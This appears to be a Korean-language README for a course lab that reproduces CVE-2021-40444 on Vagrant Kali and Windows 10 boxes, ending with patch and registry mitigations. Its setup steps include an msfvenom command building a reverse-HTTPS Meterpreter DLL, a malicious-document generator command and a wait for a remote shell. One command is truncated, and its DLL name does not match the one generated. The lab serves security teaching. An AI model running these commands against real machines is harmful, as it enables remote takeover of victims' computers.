TIC4301_Project
TIC4301 프로젝트 - CVE-2021-40444
다음 vagrant 박스를 다운로드하십시오:
Kali - https://drive.google.com/file/d/1RegQcT2jjFoaQRgLjXDYl4iS0HNt_mU2/view?usp=sharing
Win10 - https://drive.google.com/file/d/1zcLertRoI-FrHDkRq1NO-KHaF88bMv6e/view?usp=sharing
다음 명령어를 사용하여 vagrant를 통해 박스를 가져오십시오:
- vagrant box add kali_package.box
- vagrant box add victim_package.box
- vagrant init kali_package.box
- vagrant init victim_package.box
- vagrant up
설정 (win10):
- win10 박스에서 관리자로 로그인하고 비밀번호 vagrant를 입력하십시오.
- 바탕화면의 script.ps1를 마우스 오른쪽 버튼으로 클릭하고 PowerShell로 실행하십시오. (이 창을 열어 두십시오)
- ipconfig.exe를 실행하고 이 호스트의 주소를 확인하십시오.
설정 (Kali):
- cd Desktop/CVE-2021-40444.
- msfvenom을 사용하여 악성 dll을 생성하십시오. # msfvenom -p windows/x64/meterpreter/reverse_https LHOST=eth1 LPORT=443 -f dll -o test/shell.dll
- metasploit에서 리스너를 시작하십시오.
- 악성 문서를 생성하십시오. # python3 exploit.py generate test/calc.dll http://
- http://<win 10 IP>/upload에 방문하여 파일을 업로드하십시오.
- 셸을 기다리십시오.
완화 조치:
- KB5005565 핫픽스를 설치하십시오.
- 저장소에 있는 patch.reg로 Windows 레지스트리를 편집하십시오.